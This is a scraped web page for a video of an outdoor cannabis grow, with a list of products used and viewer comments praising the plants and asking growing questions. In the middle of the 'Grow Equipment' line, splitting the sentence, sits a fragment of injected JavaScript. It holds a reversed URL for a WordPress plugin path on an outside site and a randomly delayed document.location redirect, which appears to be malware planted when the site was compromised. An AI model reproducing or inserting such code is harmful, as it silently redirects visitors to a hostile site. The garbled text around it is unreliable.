In this video, GROWING GREEN shows us his beautiful outdoor cannabis grow – growing marijuana outside.
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Products shown/mentioned in this video:
Plastic grow pots-
Smart pots-
Emerald Harvest nutrients-
Emerald Harvest CalMag-
Emerald Harvest Emerald Goddess-
Emerald Harvest Honey Chome-
Emerald Harvest Root Wizard-
Mammoth P-
pH meter-
pH Up & pH Down-
PPM meter-
Bamboo stakes-

►Grow Equipment:
The BEST toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}tools and equipment for growing!
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Seeds from 3 reliable seed banks! HUGE variety and good deals!

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  1. Eric roadking says:

    Really nice job brother!! Much hard work and ya those plants are loving your nutrient combo, should have a really great harvest. Look forward to future up-dates! peace!

  2. g j says:

    Do you use any sort of Mycorrhizae ?

  3. Cheflife 420 says:

    He kills it over there great videos

  4. GROWING GREEN says:

    Thanks for sharing my vid brother!

  5. Jp Peace says:

    man they are going to be massive trees brother, keep it growin and stay blowed

  6. _6justin9torres6_ says:

    I hear korn playing in the back

  7. Rambladesman Moe says:

    Good to see some outdoor stuff. That's what I'm about. Please keep us posted. Nice work on the girls. Looking very healthy.

  8. mann5353 says:

    Very Very Nice..

  9. Cali Bud says:

    nice setup

  10. Rischa Leinweber says:

    this reminded me of a dream i had as a kid about these plants that had feelings and personality, i was taking care of them and they were taking care of me, now Im growing medical M and my garden looks a bit like this, but just 10 plants. this is a beautiful grow!

  11. Alexander Herrera says:

    Looks great.

  12. Malcolm Small says:

    my MOB is just back to veg too

  13. Malcolm Small says:

    plants grow way bigger outside

  14. Jamie Hill says:

    How do your neighbors feel about your outdoor grow haha? looks awesome man, those look so heathy!

  15. Josh Redeau says:

    so pretty

  16. Santana Ruthless says:

    how much pound of outdoor go for out there ? just want to know lol

  17. Tumbleweed Paul420 says:

    I am growing two plants for my first time. Rough start but doing much better. I have them in small containers now and they are about 6 inches tall and getting leafy. When do I move them into the ground or a large pot to finish the grow? Thanks and great video! New sub!

  18. Maria Fürst says:

    .. great plant

  19. Guy Fawkes Mulder says:

    Any Cali growers willing to let go of some trim so I can make myself some rso?
    Can't afford meds

  20. re rr says:

    Nice look 😀 Hmm i wanna to ! But I can't in nederland :(( Happy harvest

  21. Michael Boyd says:

    What do I do for an outdoor soil medium here in the Pacific Northwest.

  22. The Age of The Awakening says:

    Why do you spread hay on the top of the pot?

  23. Kat Layah says:

    Nice garden

  24. Michael Mcbratney says:

    Looking good….

  25. Midsummer night says:

    I've been checking out channels all week for outdoor grows, and yours looks the best to me!

    Very, very noice! Show me your ways. 🙂 I want to learn from the master.

  26. Dave Keith says:

    WOW! Incredible crop! I Where do I learn to do it like you?

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